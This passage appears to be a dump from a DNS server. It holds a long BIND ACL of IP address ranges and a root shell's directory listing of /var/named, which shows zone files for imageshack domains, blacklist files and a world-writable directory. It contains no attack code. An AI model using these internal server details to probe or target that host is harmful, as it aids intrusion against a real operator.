116.213.128.0/17;
116.214.32.0/19;
116.214.64.0/20;
116.214.128.0/17;
116.215.0.0/16;
116.216.0.0/14;
116.224.0.0/12;
116.242.0.0/15;
116.244.0.0/15;
116.246.0.0/15;
116.248.0.0/15;
116.251.64.0/18;
116.252.0.0/15;
116.254.128.0/17;
116.255.128.0/17;
117.8.0.0/13;
117.21.0.0/16;
117.22.0.0/15;
117.24.0.0/13;
117.32.0.0/13;
117.40.0.0/14;
117.44.0.0/15;
117.48.0.0/14;
117.53.48.0/20;
117.53.176.0/20;
117.57.0.0/16;
117.58.0.0/17;
117.59.0.0/16;
117.60.0.0/14;
117.64.0.0/13;
117.72.0.0/15;
117.74.64.0/20;
117.74.128.0/17;
117.75.0.0/16;
117.76.0.0/14;
117.80.0.0/12;
117.100.0.0/15;
117.103.16.0/20;
117.103.128.0/20;
117.106.0.0/15;
117.112.0.0/13;
117.120.64.0/18;
117.120.128.0/17;
117.121.0.0/17;
117.121.128.0/18;
117.121.192.0/21;
117.122.128.0/17;
117.124.0.0/14;
117.128.0.0/10;
118.24.0.0/15;
118.26.0.0/16;
118.27.0.0/16;
118.28.0.0/15;
118.30.0.0/16;
118.31.0.0/16;
118.64.0.0/15;
118.66.0.0/16;
118.67.112.0/20;
118.72.0.0/13;
118.80.0.0/15;
118.84.0.0/15;
118.88.32.0/19;
118.88.64.0/18;
118.88.128.0/17;
118.89.0.0/16;
118.91.240.0/20;
118.102.16.0/20;
118.112.0.0/13;
118.120.0.0/14;
118.124.0.0/15;
118.126.0.0/16;
118.132.0.0/14;
118.144.0.0/14;
118.178.0.0/16;
118.180.0.0/14;
118.184.0.0/16;
118.185.0.0/16;
118.186.0.0/15;
118.188.0.0/14;
118.192.0.0/15;
118.194.0.0/17;
118.194.128.0/17;
118.195.0.0/16;
118.196.0.0/14;
118.200.0.0/15;
118.202.0.0/15;
118.204.0.0/14;
118.212.0.0/16;
118.213.0.0/16;
118.224.0.0/14;
118.228.0.0/15;
118.230.0.0/16;
118.239.0.0/16;
118.242.0.0/16;
118.244.0.0/14;
118.248.0.0/13;
119.0.0.0/15;
119.2.0.0/19;
119.2.128.0/17;
119.3.0.0/16;
119.4.0.0/14;
119.8.0.0/15;
119.10.0.0/17;
119.15.136.0/21;
119.16.0.0/16;
119.18.192.0/20;
119.18.208.0/21;
119.18.224.0/20;
119.18.240.0/20;
119.19.0.0/16;
119.20.0.0/14;
119.27.64.0/18;
119.27.160.0/19;
119.27.192.0/18;
119.28.0.0/15;
119.30.48.0/20;
119.31.192.0/19;
119.32.0.0/14;
119.36.0.0/16;
119.37.0.0/17;
119.37.128.0/18;
119.37.192.0/18;
119.38.0.0/17;
119.38.128.0/18;
119.38.192.0/20;
119.38.208.0/20;
119.38.224.0/19;
119.39.0.0/16;
119.40.0.0/18;
119.40.64.0/20;
119.40.128.0/17;
119.41.0.0/16;
119.42.0.0/19;
119.42.136.0/21;
119.42.224.0/19;
119.44.0.0/15;
119.48.0.0/13;
119.57.0.0/16;
119.58.0.0/16;
119.59.128.0/17;
119.60.0.0/16;
119.61.0.0/16;
119.62.0.0/16;
119.63.32.0/19;
119.75.208.0/20;
119.78.0.0/15;
119.80.0.0/16;
119.81.0.0/16;
119.84.0.0/14;
119.88.0.0/14;
119.96.0.0/13;
119.108.0.0/15;
119.112.0.0/13;
119.120.0.0/13;
119.128.0.0/12;
119.144.0.0/14;
119.148.160.0/20;
119.161.128.0/17;
119.162.0.0/15;
119.164.0.0/14;
119.176.0.0/12;
119.232.0.0/15;
119.235.128.0/18;
119.248.0.0/14;
119.253.0.0/16;
119.254.0.0/15;
120.0.0.0/12;
120.24.0.0/14;
120.30.0.0/16;
120.31.0.0/16;
120.32.0.0/13;
120.40.0.0/14;
120.44.0.0/14;
120.48.0.0/15;
120.52.0.0/14;
120.64.0.0/14;
120.68.0.0/14;
120.72.32.0/19;
120.72.128.0/17;
120.76.0.0/14;
120.80.0.0/13;
120.88.8.0/21;
120.90.0.0/15;
120.92.0.0/16;
120.94.0.0/16;
120.95.0.0/16;
120.128.0.0/14;
120.132.0.0/17;
120.132.128.0/17;
120.133.0.0/16;
120.134.0.0/15;
120.136.128.0/18;
120.137.0.0/17;
120.192.0.0/10;
121.0.16.0/20;
121.4.0.0/15;
121.8.0.0/13;
121.16.0.0/13;
121.24.0.0/14;
121.28.0.0/15;
121.30.0.0/16;
121.31.0.0/16;
121.32.0.0/14;
121.36.0.0/16;
121.37.0.0/16;
121.38.0.0/15;
121.40.0.0/14;
121.46.0.0/18;
121.46.128.0/17;
121.47.0.0/16;
121.48.0.0/15;
121.51.0.0/16;
121.52.160.0/19;
121.52.208.0/20;
121.52.224.0/19;
121.55.0.0/18;
121.56.0.0/15;
121.58.0.0/17;
121.58.144.0/20;
121.59.0.0/16;
121.60.0.0/14;
121.68.0.0/14;
121.76.0.0/15;
121.79.128.0/18;
121.89.0.0/16;
121.100.128.0/17;
121.101.208.0/20;
121.192.0.0/16;
121.193.0.0/16;
121.194.0.0/15;
121.196.0.0/14;
121.201.0.0/16;
121.204.0.0/14;
121.224.0.0/12;
121.248.0.0/14;
121.255.0.0/16;
122.0.64.0/18;
122.0.128.0/17;
122.4.0.0/14;
122.8.0.0/16;
122.9.0.0/16;
122.10.0.0/17;
122.10.128.0/17;
122.11.0.0/16;
122.12.0.0/16;
122.13.0.0/16;
122.14.0.0/16;
122.15.0.0/16;
122.48.0.0/16;
122.49.0.0/18;
122.51.0.0/16;
122.64.0.0/11;
122.96.0.0/15;
122.102.0.0/20;
122.102.64.0/20;
122.102.80.0/20;
122.112.0.0/14;
122.119.0.0/16;
122.136.0.0/13;
122.144.128.0/17;
122.152.192.0/18;
122.156.0.0/14;
122.188.0.0/14;
122.192.0.0/14;
122.198.0.0/16;
122.200.64.0/18;
122.201.48.0/20;
122.204.0.0/14;
122.224.0.0/12;
122.240.0.0/13;
122.248.48.0/20;
123.0.128.0/18;
123.4.0.0/14;
123.8.0.0/13;
123.49.128.0/17;
123.52.0.0/14;
123.56.0.0/15;
123.58.0.0/16;
123.59.0.0/16;
123.60.0.0/15;
123.62.0.0/15;
123.64.0.0/11;
123.96.0.0/15;
123.98.0.0/17;
123.99.128.0/17;
123.100.0.0/19;
123.101.0.0/16;
123.103.0.0/17;
123.108.128.0/20;
123.108.208.0/20;
123.112.0.0/12;
123.128.0.0/13;
123.136.80.0/20;
123.137.0.0/16;
123.138.0.0/15;
123.144.0.0/14;
123.148.0.0/16;
123.149.0.0/16;
123.150.0.0/15;
123.152.0.0/13;
123.160.0.0/14;
123.164.0.0/14;
123.168.0.0/14;
123.172.0.0/15;
123.174.0.0/15;
123.176.60.0/22;
123.176.80.0/20;
123.177.0.0/16;
123.178.0.0/15;
123.180.0.0/14;
123.184.0.0/14;
123.188.0.0/14;
123.196.0.0/15;
123.199.128.0/17;
123.206.0.0/15;
123.232.0.0/14;
123.242.0.0/17;
123.244.0.0/14;
123.249.0.0/16;
123.253.0.0/16;
124.6.64.0/18;
124.14.0.0/15;
124.16.0.0/15;
124.20.0.0/16;
124.21.0.0/20;
124.21.16.0/20;
124.21.32.0/19;
124.21.64.0/18;
124.21.128.0/17;
124.22.0.0/15;
124.28.192.0/18;
124.29.0.0/17;
124.31.0.0/16;
124.40.112.0/20;
124.40.128.0/18;
124.42.0.0/17;
124.42.128.0/17;
124.47.0.0/18;
124.64.0.0/15;
124.66.0.0/17;
124.67.0.0/16;
124.68.0.0/14;
124.72.0.0/16;
124.73.0.0/16;
124.74.0.0/15;
124.76.0.0/14;
124.88.0.0/16;
124.89.0.0/17;
124.89.128.0/17;
124.90.0.0/15;
124.92.0.0/14;
124.108.8.0/21;
124.108.40.0/21;
124.112.0.0/15;
124.114.0.0/15;
124.116.0.0/16;
124.117.0.0/16;
124.118.0.0/15;
124.126.0.0/15;
124.128.0.0/13;
124.147.128.0/17;
124.151.0.0/16;
124.152.0.0/16;
124.156.0.0/16;
124.160.0.0/16;
124.161.0.0/16;
124.162.0.0/16;
124.163.0.0/16;
124.164.0.0/14;
124.172.0.0/15;
124.174.0.0/15;
124.192.0.0/15;
124.196.0.0/16;
124.200.0.0/13;
124.220.0.0/14;
124.224.0.0/16;
124.225.0.0/16;
124.226.0.0/15;
124.228.0.0/14;
124.232.0.0/15;
124.234.0.0/15;
124.236.0.0/14;
124.240.0.0/17;
124.240.128.0/18;
124.242.0.0/16;
124.243.192.0/18;
124.248.0.0/17;
124.249.0.0/16;
124.250.0.0/15;
124.254.0.0/18;
125.31.192.0/18;
125.32.0.0/16;
125.33.0.0/16;
125.34.0.0/16;
125.35.0.0/17;
125.35.128.0/17;
125.36.0.0/14;
125.40.0.0/13;
125.58.128.0/17;
125.61.128.0/17;
125.62.0.0/18;
125.64.0.0/13;
125.72.0.0/16;
125.73.0.0/16;
125.74.0.0/15;
125.76.0.0/17;
125.76.128.0/17;
125.77.0.0/16;
125.78.0.0/15;
125.80.0.0/13;
125.88.0.0/13;
125.96.0.0/15;
125.98.0.0/16;
125.104.0.0/13;
125.112.0.0/12;
125.169.0.0/16;
125.171.0.0/16;
125.208.0.0/18;
125.210.0.0/16;
125.211.0.0/16;
125.213.0.0/17;
125.214.96.0/19;
125.215.0.0/18;
125.216.0.0/15;
125.218.0.0/16;
125.219.0.0/16;
125.220.0.0/15;
125.222.0.0/15;
125.254.128.0/18;
125.254.192.0/18;
134.196.0.0/16;
159.226.0.0/16;
161.207.0.0/16;
162.105.0.0/16;
166.111.0.0/16;
167.139.0.0/16;
168.160.0.0/16;
175.0.0.0/12;
175.16.0.0/13;
175.24.0.0/14;
175.30.0.0/15;
175.42.0.0/15;
175.44.0.0/16;
175.46.0.0/15;
175.48.0.0/12;
175.64.0.0/11;
175.102.0.0/16;
175.106.128.0/17;
175.146.0.0/15;
175.148.0.0/14;
175.152.0.0/14;
175.160.0.0/12;
175.178.0.0/16;
175.184.128.0/18;
175.185.0.0/16;
175.186.0.0/15;
175.188.0.0/14;
180.76.0.0/16;
180.77.0.0/16;
180.78.0.0/15;
180.84.0.0/15;
180.86.0.0/16;
180.88.0.0/14;
180.94.56.0/21;
180.94.96.0/20;
180.95.128.0/17;
180.96.0.0/11;
180.129.128.0/17;
180.130.0.0/16;
180.136.0.0/13;
180.148.224.0/19;
180.149.128.0/19;
180.150.160.0/19;
180.152.0.0/13;
180.160.0.0/12;
180.178.192.0/18;
180.184.0.0/14;
180.188.0.0/17;
180.189.148.0/22;
180.200.252.0/22;
180.201.0.0/16;
180.202.0.0/15;
180.208.0.0/15;
180.210.224.0/19;
180.212.0.0/15;
180.222.224.0/19;
180.223.0.0/16;
180.233.0.0/18;
180.233.64.0/19;
180.235.64.0/19;
182.16.192.0/19;
182.18.0.0/17;
182.32.0.0/12;
182.48.96.0/19;
182.49.0.0/16;
182.50.0.0/20;
182.50.112.0/20;
182.51.0.0/16;
182.54.0.0/17;
182.61.0.0/16;
182.80.0.0/14;
182.84.0.0/14;
182.88.0.0/14;
182.92.0.0/16;
182.96.0.0/12;
182.112.0.0/12;
182.128.0.0/12;
182.144.0.0/13;
182.157.0.0/16;
182.160.64.0/19;
182.174.0.0/15;
182.200.0.0/13;
182.236.128.0/17;
182.238.0.0/16;
182.239.0.0/19;
182.240.0.0/13;
182.254.0.0/16;
183.0.0.0/10;
183.64.0.0/13;
183.81.180.0/22;
183.84.0.0/15;
183.91.128.0/22;
183.91.144.0/20;
183.92.0.0/14;
183.128.0.0/11;
183.160.0.0/13;
183.168.0.0/15;
183.170.0.0/16;
183.172.0.0/14;
183.182.0.0/19;
183.184.0.0/13;
183.192.0.0/10;
192.124.154.0/24;
192.188.170.0/24;
202.0.176.0/22;
202.4.128.0/19;
202.4.252.0/22;
202.8.128.0/19;
202.10.64.0/20;
202.12.19.0/24;
202.14.235.0/24;
202.14.236.0/23;
202.14.238.0/24;
202.22.248.0/22;
202.22.252.0/22;
202.38.2.0/23;
202.38.8.0/21;
202.38.64.0/19;
202.38.96.0/19;
202.38.128.0/23;
202.38.132.0/23;
202.38.134.0/24;
202.38.135.0/24;
202.38.138.0/24;
202.38.140.0/23;
202.38.146.0/23;
202.38.152.0/23;
202.38.160.0/23;
202.38.164.0/22;
202.38.171.0/24;
202.38.176.0/23;
202.38.184.0/21;
202.38.192.0/18;
202.41.152.0/21;
202.41.240.0/20;
202.43.76.0/22;
202.43.144.0/20;
202.46.32.0/19;
202.46.224.0/20;
202.59.232.0/23;
202.60.112.0/20;
202.63.248.0/22;
202.69.4.0/22;
202.69.16.0/20;
202.70.0.0/19;
202.74.8.0/21;
202.75.208.0/20;
202.85.208.0/20;
202.90.0.0/22;
202.90.224.0/20;
202.91.128.0/22;
202.91.176.0/20;
202.91.224.0/19;
202.92.0.0/22;
202.93.0.0/22;
202.93.252.0/22;
202.95.0.0/22;
202.95.4.0/22;
202.95.8.0/21;
202.95.16.0/20;
202.95.252.0/22;
202.96.0.0/18;
202.96.64.0/21;
202.96.72.0/21;
202.96.80.0/20;
202.96.96.0/21;
202.96.104.0/21;
202.96.112.0/20;
202.96.128.0/21;
202.96.136.0/21;
202.96.144.0/20;
202.96.160.0/21;
202.96.168.0/21;
202.96.176.0/20;
202.96.192.0/21;
202.96.200.0/21;
202.96.208.0/20;
202.96.224.0/21;
202.96.232.0/21;
202.96.240.0/20;
202.97.0.0/21;
202.97.8.0/21;
202.97.16.0/20;
202.97.32.0/19;
202.97.64.0/19;
202.97.96.0/20;
202.97.112.0/20;
202.97.128.0/18;
202.97.192.0/19;
202.97.224.0/21;
202.97.232.0/21;
202.97.240.0/20;
202.98.0.0/21;
202.98.8.0/21;
202.98.16.0/20;
202.98.32.0/21;
202.98.40.0/21;
202.98.48.0/20;
202.98.64.0/19;
202.98.96.0/21;
202.98.104.0/21;
202.98.112.0/20;
202.98.128.0/19;
202.98.160.0/21;
202.98.168.0/21;
202.98.176.0/20;
202.98.192.0/21;
202.98.200.0/21;
202.98.208.0/20;
202.98.224.0/21;
202.98.232.0/21;
202.98.240.0/20;
202.99.0.0/18;
202.99.64.0/19;
202.99.96.0/21;
202.99.104.0/21;
202.99.112.0/20;
202.99.128.0/19;
202.99.160.0/21;
202.99.168.0/21;
202.99.176.0/20;
202.99.192.0/21;
202.99.200.0/21;
202.99.208.0/20;
202.99.224.0/21;
202.99.232.0/21;
202.99.240.0/20;
202.100.0.0/21;
202.100.8.0/21;
202.100.16.0/20;
202.100.32.0/19;
202.100.64.0/21;
202.100.72.0/21;
202.100.80.0/20;
202.100.96.0/21;
202.100.104.0/21;
202.100.112.0/20;
202.100.128.0/21;
202.100.136.0/21;
202.100.144.0/20;
202.100.160.0/21;
202.100.168.0/21;
202.100.176.0/20;
202.100.192.0/21;
202.100.200.0/21;
202.100.208.0/20;
202.100.224.0/19;
202.101.0.0/18;
202.101.64.0/19;
202.101.96.0/19;
202.101.128.0/18;
202.101.192.0/19;
202.101.224.0/21;
202.101.232.0/21;
202.101.240.0/20;
202.102.0.0/19;
202.102.32.0/19;
202.102.64.0/18;
202.102.128.0/21;
202.102.136.0/21;
202.102.144.0/20;
202.102.160.0/19;
202.102.192.0/21;
202.102.200.0/21;
202.102.208.0/20;
202.102.224.0/21;
202.102.232.0/21;
202.102.240.0/20;
202.103.0.0/21;
202.103.8.0/21;
202.103.16.0/20;
202.103.32.0/19;
202.103.64.0/19;
202.103.96.0/21;
202.103.104.0/21;
202.103.112.0/20;
202.103.128.0/18;
202.103.192.0/19;
202.103.224.0/21;
202.103.232.0/21;
202.103.240.0/20;
202.104.0.0/15;
202.106.0.0/16;
202.107.0.0/17;
202.107.128.0/17;
202.108.0.0/16;
202.109.0.0/16;
202.110.0.0/18;
202.110.64.0/18;
202.110.128.0/18;
202.110.192.0/18;
202.111.0.0/17;
202.111.128.0/19;
202.111.160.0/19;
202.111.192.0/18;
202.112.0.0/16;
202.113.0.0/20;
202.113.16.0/20;
202.113.32.0/19;
202.113.64.0/18;
202.113.128.0/18;
202.113.192.0/19;
202.113.224.0/20;
202.113.240.0/20;
202.114.0.0/19;
202.114.32.0/19;
202.114.64.0/18;
202.114.128.0/17;
202.115.0.0/19;
202.115.32.0/19;
202.115.64.0/18;
202.115.128.0/17;
202.116.0.0/19;
202.116.32.0/20;
202.116.48.0/20;
202.116.64.0/19;
202.116.96.0/19;
202.116.128.0/17;
202.117.0.0/18;
202.117.64.0/18;
202.117.128.0/17;
202.118.0.0/19;
202.118.32.0/19;
202.118.64.0/18;
202.118.128.0/17;
202.119.0.0/19;
202.119.32.0/19;
202.119.64.0/20;
202.119.80.0/20;
202.119.96.0/19;
202.119.128.0/17;
202.120.0.0/18;
202.120.64.0/18;
202.120.128.0/17;
202.121.0.0/16;
202.122.0.0/21;
202.122.32.0/21;
202.122.64.0/19;
202.122.112.0/21;
202.122.128.0/24;
202.123.96.0/20;
202.125.176.0/20;
202.127.0.0/23;
202.127.2.0/24;
202.127.3.0/24;
202.127.4.0/24;
202.127.5.0/24;
202.127.6.0/23;
202.127.12.0/22;
202.127.16.0/20;
202.127.40.0/21;
202.127.48.0/20;
202.127.112.0/20;
202.127.144.0/20;
202.127.160.0/21;
202.127.192.0/23;
202.127.200.0/21;
202.127.208.0/24;
202.127.209.0/24;
202.127.216.0/21;
202.127.224.0/19;
202.130.0.0/19;
202.130.224.0/19;
202.131.16.0/21;
202.131.48.0/20;
202.131.208.0/20;
202.136.48.0/20;
202.136.208.0/20;
202.136.224.0/20;
202.141.160.0/19;
202.142.16.0/20;
202.143.16.0/20;
202.148.96.0/19;
202.149.160.0/19;
202.149.224.0/19;
202.150.16.0/20;
202.152.176.0/20;
202.153.48.0/20;
202.158.160.0/19;
202.160.176.0/20;
202.164.0.0/20;
202.164.25.0/24;
202.165.96.0/20;
202.165.176.0/20;
202.165.208.0/20;
202.168.160.0/20;
202.168.176.0/20;
202.170.128.0/19;
202.170.216.0/21;
202.173.8.0/21;
202.173.224.0/19;
202.179.240.0/20;
202.180.128.0/19;
202.181.112.0/20;
202.189.80.0/20;
202.192.0.0/13;
202.200.0.0/14;
202.204.0.0/14;
203.18.50.0/24;
203.79.0.0/20;
203.79.32.0/20;
203.80.144.0/20;
203.81.16.0/20;
203.83.56.0/21;
203.86.0.0/19;
203.86.32.0/19;
203.86.64.0/20;
203.86.80.0/20;
203.88.32.0/19;
203.88.192.0/19;
203.89.0.0/22;
203.90.0.0/22;
203.90.128.0/19;
203.90.160.0/19;
203.90.192.0/19;
203.91.32.0/19;
203.91.96.0/20;
203.91.120.0/21;
203.92.160.0/19;
203.93.0.0/22;
203.93.4.0/22;
203.93.8.0/24;
203.93.9.0/24;
203.93.10.0/23;
203.93.12.0/22;
203.93.16.0/20;
203.93.32.0/19;
203.93.64.0/18;
203.93.128.0/21;
203.93.136.0/22;
203.93.140.0/24;
203.93.141.0/24;
203.93.142.0/23;
203.93.144.0/20;
203.93.160.0/19;
203.93.192.0/18;
203.94.0.0/22;
203.94.4.0/22;
203.94.8.0/21;
203.94.16.0/20;
203.95.0.0/21;
203.95.96.0/20;
203.95.112.0/20;
203.99.16.0/20;
203.99.80.0/20;
203.100.32.0/20;
203.100.80.0/20;
203.100.96.0/19;
203.100.192.0/20;
203.110.160.0/19;
203.114.244.0/22;
203.118.192.0/19;
203.118.248.0/22;
203.119.24.0/21;
203.119.32.0/22;
203.119.80.0/22;
203.119.85.0/24;
203.128.32.0/19;
203.128.96.0/19;
203.130.32.0/19;
203.132.32.0/19;
203.134.240.0/21;
203.135.96.0/20;
203.135.112.0/20;
203.135.160.0/20;
203.148.0.0/18;
203.152.64.0/19;
203.156.192.0/18;
203.158.16.0/21;
203.161.180.0/24;
203.161.192.0/19;
203.166.160.0/19;
203.171.224.0/20;
203.174.7.0/24;
203.174.96.0/19;
203.175.128.0/19;
203.175.192.0/18;
203.176.168.0/21;
203.184.80.0/20;
203.187.160.0/19;
203.190.96.0/20;
203.191.16.0/20;
203.191.64.0/18;
203.191.144.0/21;
203.191.152.0/21;
203.192.0.0/19;
203.196.0.0/21;
203.207.64.0/18;
203.207.128.0/17;
203.208.0.0/20;
203.208.16.0/22;
203.208.32.0/19;
203.209.224.0/19;
203.212.0.0/20;
203.212.80.0/20;
203.222.192.0/20;
203.223.0.0/20;
210.2.0.0/20;
210.2.16.0/20;
210.5.0.0/19;
210.5.144.0/20;
210.12.0.0/18;
210.12.64.0/18;
210.12.128.0/18;
210.12.192.0/18;
210.13.0.0/18;
210.13.64.0/18;
210.13.128.0/17;
210.14.64.0/19;
210.14.112.0/20;
210.14.128.0/19;
210.14.160.0/19;
210.14.192.0/19;
210.14.224.0/19;
210.15.0.0/19;
210.15.32.0/19;
210.15.64.0/19;
210.15.96.0/19;
210.15.128.0/18;
210.16.128.0/18;
210.21.0.0/17;
210.21.128.0/17;
210.22.0.0/16;
210.23.32.0/19;
210.25.0.0/16;
210.26.0.0/15;
210.28.0.0/14;
210.32.0.0/14;
210.36.0.0/14;
210.40.0.0/13;
210.51.0.0/16;
210.52.0.0/18;
210.52.64.0/18;
210.52.128.0/17;
210.53.0.0/17;
210.53.128.0/17;
210.56.192.0/19;
210.72.0.0/17;
210.72.128.0/19;
210.72.160.0/19;
210.72.192.0/18;
210.73.0.0/19;
210.73.32.0/19;
210.73.64.0/18;
210.73.128.0/17;
210.74.0.0/19;
210.74.32.0/19;
210.74.64.0/19;
210.74.96.0/19;
210.74.128.0/19;
210.74.160.0/19;
210.74.192.0/18;
210.75.0.0/16;
210.76.0.0/19;
210.76.32.0/19;
210.76.64.0/18;
210.76.128.0/17;
210.77.0.0/16;
210.78.0.0/19;
210.78.32.0/19;
210.78.64.0/18;
210.78.128.0/19;
210.78.160.0/19;
210.78.192.0/18;
210.79.64.0/18;
210.79.224.0/19;
210.82.0.0/15;
210.87.128.0/20;
210.87.144.0/20;
210.87.160.0/19;
210.185.192.0/18;
210.192.96.0/19;
211.64.0.0/14;
211.68.0.0/15;
211.70.0.0/15;
211.80.0.0/16;
211.81.0.0/16;
211.82.0.0/16;
211.83.0.0/16;
211.84.0.0/15;
211.86.0.0/15;
211.88.0.0/16;
211.89.0.0/16;
211.90.0.0/15;
211.92.0.0/15;
211.94.0.0/15;
211.96.0.0/15;
211.98.0.0/16;
211.99.0.0/18;
211.99.64.0/19;
211.99.96.0/19;
211.99.128.0/17;
211.100.0.0/16;
211.101.0.0/18;
211.101.64.0/18;
211.101.128.0/17;
211.102.0.0/16;
211.103.0.0/17;
211.103.128.0/17;
211.136.0.0/14;
211.140.0.0/15;
211.142.0.0/17;
211.142.128.0/17;
211.143.0.0/16;
211.144.0.0/15;
211.146.0.0/16;
211.147.0.0/16;
211.148.0.0/14;
211.152.0.0/15;
211.154.0.0/16;
211.155.0.0/18;
211.155.64.0/19;
211.155.96.0/19;
211.155.128.0/17;
211.156.0.0/14;
211.160.0.0/14;
211.164.0.0/14;
218.0.0.0/16;
218.1.0.0/16;
218.2.0.0/15;
218.4.0.0/15;
218.6.0.0/16;
218.7.0.0/16;
218.8.0.0/15;
218.10.0.0/16;
218.11.0.0/16;
218.12.0.0/16;
218.13.0.0/16;
218.14.0.0/15;
218.16.0.0/14;
218.20.0.0/16;
218.21.0.0/17;
218.21.128.0/17;
218.22.0.0/15;
218.24.0.0/15;
218.26.0.0/16;
218.27.0.0/16;
218.28.0.0/15;
218.30.0.0/15;
218.56.0.0/14;
218.60.0.0/15;
218.62.0.0/17;
218.62.128.0/17;
218.63.0.0/16;
218.64.0.0/15;
218.66.0.0/16;
218.67.0.0/17;
218.67.128.0/17;
218.68.0.0/15;
218.70.0.0/15;
218.72.0.0/14;
218.76.0.0/15;
218.78.0.0/15;
218.80.0.0/14;
218.84.0.0/14;
218.88.0.0/13;
218.96.0.0/15;
218.98.0.0/17;
218.98.128.0/18;
218.98.192.0/19;
218.98.224.0/19;
218.99.0.0/16;
218.104.0.0/17;
218.104.128.0/19;
218.104.160.0/19;
218.104.192.0/21;
218.104.200.0/21;
218.104.208.0/20;
218.104.224.0/19;
218.105.0.0/16;
218.106.0.0/15;
218.108.0.0/16;
218.109.0.0/16;
218.185.192.0/19;
218.192.0.0/16;
218.193.0.0/16;
218.194.0.0/16;
218.195.0.0/16;
218.196.0.0/14;
218.200.0.0/14;
218.204.0.0/15;
218.206.0.0/15;
218.240.0.0/14;
218.244.0.0/15;
218.246.0.0/15;
218.249.0.0/16;
219.72.0.0/16;
219.82.0.0/16;
219.128.0.0/12;
219.144.0.0/14;
219.148.0.0/16;
219.149.0.0/17;
219.149.128.0/18;
219.149.192.0/18;
219.150.0.0/19;
219.150.32.0/19;
219.150.64.0/19;
219.150.96.0/20;
219.150.112.0/20;
219.150.128.0/17;
219.151.0.0/19;
219.151.32.0/19;
219.151.64.0/18;
219.151.128.0/17;
219.152.0.0/15;
219.154.0.0/15;
219.156.0.0/15;
219.158.0.0/17;
219.158.128.0/17;
219.159.0.0/18;
219.159.64.0/18;
219.159.128.0/17;
219.216.0.0/15;
219.218.0.0/15;
219.220.0.0/16;
219.221.0.0/16;
219.222.0.0/15;
219.224.0.0/15;
219.226.0.0/16;
219.227.0.0/16;
219.228.0.0/15;
219.230.0.0/15;
219.232.0.0/14;
219.236.0.0/15;
219.238.0.0/15;
219.242.0.0/15;
219.244.0.0/14;
220.101.192.0/18;
220.112.0.0/14;
220.152.128.0/17;
220.154.0.0/15;
220.160.0.0/11;
220.192.0.0/15;
220.194.0.0/15;
220.196.0.0/14;
220.200.0.0/13;
220.231.0.0/18;
220.231.128.0/17;
220.232.64.0/18;
220.234.0.0/16;
220.242.0.0/15;
220.248.0.0/14;
220.252.0.0/16;
221.0.0.0/15;
221.2.0.0/16;
221.3.0.0/17;
221.3.128.0/17;
221.4.0.0/16;
221.5.0.0/17;
221.5.128.0/17;
221.6.0.0/16;
221.7.0.0/19;
221.7.32.0/19;
221.7.64.0/19;
221.7.96.0/19;
221.7.128.0/17;
221.8.0.0/15;
221.10.0.0/16;
221.11.0.0/17;
221.11.128.0/18;
221.11.192.0/19;
221.11.224.0/19;
221.12.0.0/17;
221.12.128.0/18;
221.13.0.0/18;
221.13.64.0/19;
221.13.96.0/19;
221.13.128.0/17;
221.14.0.0/15;
221.122.0.0/15;
221.129.0.0/16;
221.130.0.0/15;
221.133.224.0/19;
221.136.0.0/16;
221.137.0.0/16;
221.172.0.0/14;
221.176.0.0/13;
221.192.0.0/15;
221.194.0.0/16;
221.195.0.0/16;
221.196.0.0/15;
221.198.0.0/16;
221.199.0.0/19;
221.199.32.0/20;
221.199.48.0/20;
221.199.64.0/18;
221.199.128.0/18;
221.199.192.0/20;
221.199.224.0/19;
221.200.0.0/14;
221.204.0.0/15;
221.206.0.0/16;
221.207.0.0/18;
221.207.64.0/18;
221.207.128.0/17;
221.208.0.0/14;
221.212.0.0/16;
221.213.0.0/16;
221.214.0.0/15;
221.216.0.0/13;
221.224.0.0/13;
221.232.0.0/14;
221.236.0.0/15;
221.238.0.0/16;
221.239.0.0/17;
221.239.128.0/17;
222.16.0.0/15;
222.18.0.0/15;
222.20.0.0/15;
222.22.0.0/16;
222.23.0.0/16;
222.24.0.0/15;
222.26.0.0/15;
222.28.0.0/14;
222.32.0.0/11;
222.64.0.0/13;
222.72.0.0/15;
222.74.0.0/16;
222.75.0.0/16;
222.76.0.0/14;
222.80.0.0/15;
222.82.0.0/16;
222.83.0.0/17;
222.83.128.0/17;
222.84.0.0/16;
222.85.0.0/17;
222.85.128.0/17;
222.86.0.0/15;
222.88.0.0/15;
222.90.0.0/15;
222.92.0.0/14;
222.125.0.0/16;
222.126.128.0/17;
222.128.0.0/14;
222.132.0.0/14;
222.136.0.0/13;
222.160.0.0/15;
222.162.0.0/16;
222.163.0.0/19;
222.163.32.0/19;
222.163.64.0/18;
222.163.128.0/17;
222.168.0.0/15;
222.170.0.0/15;
222.172.0.0/17;
222.172.128.0/17;
222.173.0.0/16;
222.174.0.0/15;
222.176.0.0/13;
222.184.0.0/13;
222.192.0.0/14;
222.196.0.0/15;
222.198.0.0/16;
222.199.0.0/16;
222.200.0.0/14;
222.204.0.0/15;
222.206.0.0/15;
222.208.0.0/13;
222.216.0.0/15;
222.218.0.0/16;
222.219.0.0/16;
222.220.0.0/15;
222.222.0.0/15;
222.240.0.0/13;
222.248.0.0/16;
222.249.0.0/17;
222.249.128.0/19;
222.249.160.0/20;
222.249.176.0/20;
222.249.192.0/18;
223.2.0.0/15;
223.4.0.0/14;
223.8.0.0/13;
223.20.0.0/15;
223.27.184.0/22;
223.64.0.0/10;
223.128.0.0/15;
223.144.0.0/12;
223.160.0.0/14;
223.166.0.0/15;
223.192.0.0/15;
223.198.0.0/15;
223.201.0.0/16;
223.202.0.0/15;
223.208.0.0/14;
223.212.0.0/15;
223.214.0.0/15;
223.220.0.0/15;
223.223.176.0/20;
223.223.192.0/20;
223.240.0.0/13;
223.248.0.0/14;
223.252.128.0/17;
223.254.0.0/16;
223.255.0.0/17;
};
# ls -alth /var/named/
total 1.1M
-rw-rw-r-- 1 named root 522 Sep 2 10:32 named.stats
drwxr-x--- 9 named root 4.0K Feb 10 2012 .
-rw-r--r-- 1 root root 796 Feb 10 2012 ezrinet.com.db
-rw-r--r-- 1 root root 695 Feb 3 2012 imageshack.com.au.db
drwxrwxrwx 3 named named 4.0K Oct 18 2011 master
drwxr-xr-x 3 511 users 4.0K Aug 31 2011 reverse
-rw------- 1 named named 56K Apr 21 2011 echo.cx.db
-rw-r--r-- 1 named named 56K Apr 21 2011 exs.cx.db
-rw-r--r-- 1 named named 56K Apr 21 2011 imageshack.us.db
-rw-r--r-- 1 root root 92K Feb 19 2011 black
-rw-r--r-- 1 root root 86K Feb 19 2011 blacklist.acl
-rw-r--r-- 1 root root 1.5K Feb 12 2011 imageshack.net.db
